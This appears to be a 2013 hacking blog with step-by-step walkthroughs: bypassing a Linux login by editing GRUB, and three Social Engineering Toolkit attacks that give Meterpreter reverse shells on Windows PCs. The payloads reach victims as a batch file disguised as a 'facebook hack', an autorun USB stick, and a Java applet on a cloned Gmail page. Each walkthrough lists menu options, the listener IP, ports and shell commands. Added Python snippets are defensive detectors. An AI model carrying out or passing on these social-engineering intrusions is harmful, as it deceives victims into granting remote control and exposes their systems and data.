Friday, September 6, 2013

HOW TO HACK/RESET KALI LINUX LOGIN PASSWORD

1. First boot your Kali Linux and wait until the GRUB menu appears.

When you see the GRUB menu, scroll down to recovery mode, then press E.


2. After pressing E you will see this screen. Here you have to change one word and add one parameter, as shown in the image:

CHANGE ro TO rw

AND ADD init=/bin/bash


3. After changing and adding, just press F10.

After pressing F10 it will reboot and you will see this screen. Here you have to type a command and hit Enter:

COMMAND :  passwd root


4. Then type your new root password, hit Enter, retype your root password and hit Enter again. After that you will see a message that the password was updated successfully.




5. Now power off by pressing your laptop/PC power button, switch it on again, and log in with your new password.
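An added example, not part of the original post: the steps above work on any machine whose GRUB entries can be edited without a password, so this Python check looks for GRUB's `superusers` and `password`/`password_pbkdf2` directives in a configuration and for the step 2 edits in a kernel command line (for example the contents of `/proc/cmdline`). The sample configuration, the command lines and the list of normal init paths are constructed assumptions.

```python
import re

# Assumption: init paths treated as normal on a Debian-based system.
NORMAL_INIT = {"/sbin/init", "/lib/systemd/systemd", "/usr/lib/systemd/systemd"}

def grub_editing_protected(grub_cfg):
    """True if grub.cfg names a superuser and sets a password for that user."""
    users, with_password = set(), set()
    for raw in grub_cfg.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r'set\s+superusers\s*=\s*"?([^"]*)"?', line)
        if m:
            # GRUB separates user names with spaces, commas, ';', '|' or '&'.
            users.update(u for u in re.split(r"[\s,;|&]+", m.group(1)) if u)
        m = re.match(r"password(?:_pbkdf2)?\s+(\S+)\s+\S+", line)
        if m:
            with_password.add(m.group(1))
    return bool(users & with_password)

def cmdline_findings(cmdline):
    """Report the step 2 edits if they appear in a kernel command line."""
    tokens = cmdline.split()
    findings = ["init override: " + t[5:] for t in tokens
                if t.startswith("init=") and t[5:] not in NORMAL_INIT]
    if findings and "rw" in tokens:
        findings.append("root filesystem mounted read-write")
    return findings

# Constructed samples (not taken from a real system).
UNPROTECTED_CFG = 'menuentry "Kali GNU/Linux" {\n  linux /vmlinuz root=/dev/sda1 ro quiet\n}\n'
PROTECTED_CFG = ('set superusers="admin"\n'
                 "password_pbkdf2 admin grub.pbkdf2.sha512.10000.PLACEHOLDER\n"
                 + UNPROTECTED_CFG)
EDITED_CMDLINE = "BOOT_IMAGE=/vmlinuz root=/dev/sda1 rw init=/bin/bash"
NORMAL_CMDLINE = "BOOT_IMAGE=/vmlinuz root=/dev/sda1 ro quiet"

if __name__ == "__main__":
    for name, cfg in (("unprotected", UNPROTECTED_CFG), ("protected", PROTECTED_CFG)):
        state = "password set" if grub_editing_protected(cfg) else "editable by anyone"
        print(name, "->", state)
    for cl in (EDITED_CMDLINE, NORMAL_CMDLINE):
        print(cmdline_findings(cl) or "no findings", "<-", cl)
```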




Hack Windows Vista,7,8 And Above PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus)

The Powershell Attack Vector module allows you to create PowerShell-specific attacks. These attacks will allow you to use PowerShell, which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.

Powershell Alphanumeric Shellcode Injector
Powershell Reverse Shell
Powershell Bind Shell
Powershell Dump SAM Database

SUPPORTED OS :  VISTA,7,8 AND ABOVE.

IN THIS TUTORIAL I HAVE HACKED MY OWN WINDOWS 7 PC.

OPEN THE SOCIAL ENGINEERING TOOLKIT



CHOOSE NO 1 => SOCIAL-ENGINEERING ATTACKS


SELECT OPTION 10 => POWERSHELL ATTACK VECTORS


NOW SELECT OPTION 1 => POWERSHELL ALPHANUMERIC SHELLCODE INJECTOR


AFTER THAT, ENTER YOUR IP AND PORT THERE.

I WILL USE MY IP 192.168.152.132
PORT 443



NOW TYPE "YES" AND START LISTENER.


YOU HAVE TWO OPTIONS THERE: x86 AND x64.

TYPE =>  x64

AND PRESS ENTER.


NOW YOU SEE THE LISTENER IS STARTED


IN KALI LINUX, THE DIRECTORY WHERE THE POWERSHELL FILES ARE CREATED IS

/root/.set/reports/powershell

IF YOU DO NOT FIND THEM, JUST USE THE COMMAND TO COPY THE FILES.

I HAD MADE A FOLDER ON THE DESKTOP NAMED POWERSHELL.



AFTER THE COPY HAS FINISHED, YOU WILL SEE THE FILES IN YOUR FOLDER.


AFTER GETTING THE FILES, I HAVE RENAMED x64_powershell_injection.txt TO facebook hack.bat

SEND THIS FILE TO THE VICTIM VIA CHAT OR MESSAGING.



AFTER THE VICTIM ACTS ON THE BATCH FILE, THE EXPLOIT GOES TO WORK

AND YOU GET THE SESSION FROM THE VICTIM'S PC.


YOU GET THE SYSTEM USING THE SESSION.

TYPE :  sessions -l  (to see the sessions list)

TYPE :  sessions -i ID  (put here id=1 and you got the system)

TYPE :  sysinfo  (to get the system details)

TYPE :  shell  (to get a shell from the victim's PC)
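An added example, not part of the original post: a defender-side check for the delivery described above, a batch file that starts PowerShell. It scores process-creation command lines by their PowerShell switches and decodes any `-EncodedCommand` argument for review. The page does not show the file's contents, so the switches scored here, the weights, the threshold and the log lines are constructed assumptions; the encoded sample decodes to a harmless `Write-Output`.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of a switch (-enc, -nop, -w, ...).
# The weights and the threshold are assumptions chosen for this example.
SWITCH_WEIGHTS = {"encodedcommand": 3, "windowstyle": 2,
                  "noprofile": 1, "noninteractive": 1}
ALERT_AT = 5
PS_BINARY = re.compile(r"(^|[\\/])(powershell|pwsh)(\.exe)?$", re.I)

def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(cmdline):
    """Score one process command line; None if it does not start PowerShell."""
    tokens = [t.strip('"') for t in cmdline.split()]
    if not any(PS_BINARY.search(t) for t in tokens):
        return None
    score, decoded = 0, None
    for i, tok in enumerate(tokens):
        name = tok[1:].lower()
        if tok[:1] not in "-/" or not name:
            continue
        for switch, weight in SWITCH_WEIGHTS.items():
            if switch.startswith(name):
                score += weight
                if switch == "encodedcommand" and i + 1 < len(tokens):
                    decoded = decode_encoded_command(tokens[i + 1])
                break
    return {"score": score, "decoded": decoded}

def alerts(cmdlines):
    """Return (command line, result) pairs that reach the alert threshold."""
    scored = ((line, analyse(line)) for line in cmdlines)
    return [(l, r) for l, r in scored if r and r["score"] >= ALERT_AT]

# Constructed process-creation command lines; the payload is a harmless stand-in.
BENIGN = base64.b64encode("Write-Output 'test'".encode("utf-16-le")).decode()
SAMPLE_LOG = [
    r'cmd.exe /c "C:\Users\user\Downloads\facebook hack.bat"',
    "powershell.exe -nop -win hidden -noni -enc " + BENIGN,
    r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    print(alerts(SAMPLE_LOG))
```

Command lines for this check come from process-creation telemetry such as Security event 4688 with command-line auditing enabled, or Sysmon event 1.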




Thursday, September 5, 2013

Hack Any Windows PC using USB Device and SET Toolkit (Infectious Media Generator Attack)

ATTACK NAME : INFECTIOUS MEDIA GENERATOR ATTACK

ATTACKING OS :  ALL WINDOWS OS

THIS TECHNIQUE IS MOSTLY USED TO INFECT YOUR VICTIM USING EXECUTABLE FILES FROM USB DEVICES. NOWADAYS PEOPLE MOSTLY USE USB DEVICES TO TRANSFER DATA, AND THAT IS THE REASON THIS SOCIAL ENGINEERING ATTACK WAS BORN.

IN THIS TUTORIAL I HACKED MY OWN WINDOWS XP SP2 MACHINE.

OPEN SET TOOLKIT.


SELECT OPTION "1" => SOCIAL-ENGINEERING ATTACKS


SELECT OPTION 3 => INFECTIOUS MEDIA GENERATOR


SELECT OPTION 2 => STANDARD METASPLOIT EXECUTABLE


IT ASKS FOR YOUR IP FOR THE REVERSE CONNECTION TO YOUR PC.

JUST ENTER YOUR IP ADDRESS. MINE IS 192.168.152.132, SO I PUT IT THERE.


SELECT OPTION 2 => WINDOWS REVERSE_TCP METERPRETER


TO ENCRYPT YOUR EXECUTABLE FILE, USE ANY OF THEM. I WILL USE
2) SHIKATA_GA_NAI

ALTERNATIVELY, YOU CAN ALSO USE OPTIONS 15 AND 16; THEY ARE ALSO GOOD FOR THE JOB.


AFTER THAT IT ASKS FOR A PORT TO CONNECT TO.

I AM USING 1234 AS THE PORT, BUT YOU CAN USE YOUR OWN.


AFTER ADDING THE PORT, THE EXECUTABLE FILE AND THE AUTORUN FILE ARE CREATED.

YOU CAN GO TO THE DIRECTORY IN KALI LINUX TO GET THE FILES YOU HAVE CREATED FOR THIS ATTACK.

JUST COPY THESE FILES TO A USB DEVICE AND GIVE IT TO YOUR VICTIM.


NOW IT'S TIME TO LISTEN, SO TYPE "YES" AND PRESS ENTER TO GET A LISTENING SESSION.


NOW THE HANDLER HAS STARTED AND WAITS FOR THE VICTIM'S ACTION.


THE VICTIM HAS INSERTED THE USB DEVICE INTO HIS MACHINE, AND THAT IS WHY YOU GET SESSION 1 THERE.



ENTER THE COMMAND TO GET THE LIST OF OPEN SESSIONS.

COMMAND :  sessions -l




TO SELECT AND START THE SESSION, JUST ENTER THE COMMAND IN THE TERMINAL.

COMMAND :  sessions -i ID


USE ANOTHER COMMAND TO SEE WHICH WINDOWS OS VERSION THE VICTIM IS USING.

COMMAND :  sysinfo


TO GET A SHELL FROM THE VICTIM'S PC, YOU NEED TO ENTER THE COMMAND.

COMMAND :  shell
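An added example, not part of the original post: a defender-side parser for the autorun file that this attack places beside the executable on the USB device. It reads an `autorun.inf` and reports which programs its `[autorun]` section would start. The sample file contents and the name `program.exe` are constructed, and the list of launch keys and extensions is an assumption.

```python
# Keys in the [autorun] section that start a program (assumed sufficient here).
LAUNCH_KEYS = ("open", "shellexecute")
EXECUTABLE_EXT = (".exe", ".bat", ".cmd", ".com", ".scr", ".pif", ".vbs", ".js")

def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section, keys lower-cased."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def program_of(value):
    """Strip arguments: take the quoted path, or the first whitespace token."""
    if value.startswith('"'):
        return value[1:].split('"', 1)[0]
    return value.split()[0] if value else ""

def launch_targets(entries):
    """Programs the file would start, as (key, program) pairs."""
    targets = []
    for key, value in entries.items():
        is_verb = key.startswith("shell\\") and key.endswith("\\command")
        if key in LAUNCH_KEYS or is_verb:
            targets.append((key, program_of(value)))
    return targets

def findings(text):
    """Launch targets whose extension marks them as directly executable."""
    return [(k, p) for k, p in launch_targets(parse_autorun(text))
            if p.lower().endswith(EXECUTABLE_EXT)]

# Constructed samples: program.exe is a placeholder name, not from the post.
SUSPICIOUS = ("[AutoRun]\nOPEN=program.exe\nicon=autorun.ico\n"
              "shell\\open\\command=program.exe /q\n")
BENIGN = "; vendor media\n[autorun]\nicon=setup.ico\nlabel=Drivers\n"

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, findings(text))
```

Windows 7 and later ignore the `open` entry on USB mass-storage devices by default; on older systems AutoRun can be switched off with the `NoDriveTypeAutoRun` policy value.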


Tuesday, September 3, 2013

Bypassing Antivirus using Multi Pyinjector Shell Code Injection

IN THIS TUTORIAL I HAVE HACKED MY OWN WINDOWS 8 PC.

WORKING PLATFORM : WINDOWS, LINUX, MAC

PREREQUISITE : JAVA INSTALLED ON THE VICTIM'S PC.

OPEN SET TOOLKIT:

APPLICATION > KALI LINUX > EXPLOITATION TOOLS > SOCIAL ENGINEERING TOOLKIT > SE-TOOLKIT



AFTER OPENING SET YOU SEE THIS.


LET'S CHOOSE NO "1" => SOCIAL-ENGINEERING ATTACKS


LET'S CHOOSE NO 2 => WEBSITE ATTACK VECTORS


SELECT OPTION 1 => JAVA APPLET ATTACK METHOD


LET'S CHOOSE OPTION 2 => SITE CLONER


SET NAT/PORT FORWARDING TO => "NO"


ENTER YOUR "IP-ADDRESS" HERE FOR THE REVERSE CONNECTION


ENTER THE SITE WHICH YOU WANT TO CLONE.
I AM USING GMAIL.


AFTER THAT, THE TASK IS TO CHOOSE THE PAYLOAD. JUST ENTER NO 16 => MULTIPYINJECTOR SHELLCODE INJECTION


CHOOSE 1 => WINDOWS METERPRETER REVERSE TCP
CHOOSE PORT => 444. YOU CAN USE ANY PORT.


I AM CHOOSING TWO MORE PORTS SO THE SESSION OF HACKING IS MORE POWERFUL.
I AM USING 444 AND 445, TWO MORE PORTS, HERE.


NOW SELECT THE OPTION 6 => I'M FINISHED ADDING PAYLOAD.


YOU CAN SEE SOMETHING LIKE THIS.
IT IS STARTING THE PAYLOAD HANDLER AND WAITING FOR THE VICTIM'S REPLY.




GIVE YOUR VICTIM YOUR IP ADDRESS. MINE IS "192.168.152.132".
WHEN THE VICTIM PUTS YOUR IP IN THEIR BROWSER, HE/SHE GETS A JAVA POP-UP.
WHEN HE/SHE RUNS THIS APPLET, THE MACHINE IS HACKED.


NOW THE VICTIM HAS RUN YOUR APPLET ON HIS PC, SO YOU GET SOMETHING LIKE THIS.


AFTER THAT, ENTER A COMMAND TO GET THE SESSIONS YOU HAVE GOT FROM THE VICTIM'S PC.

COMMAND :  sessions -l


CHOOSE ANY SESSION FROM THE LIST USING THIS COMMAND =>  sessions -i ID

TYPE =>  shell

TO GET THE SYSTEM.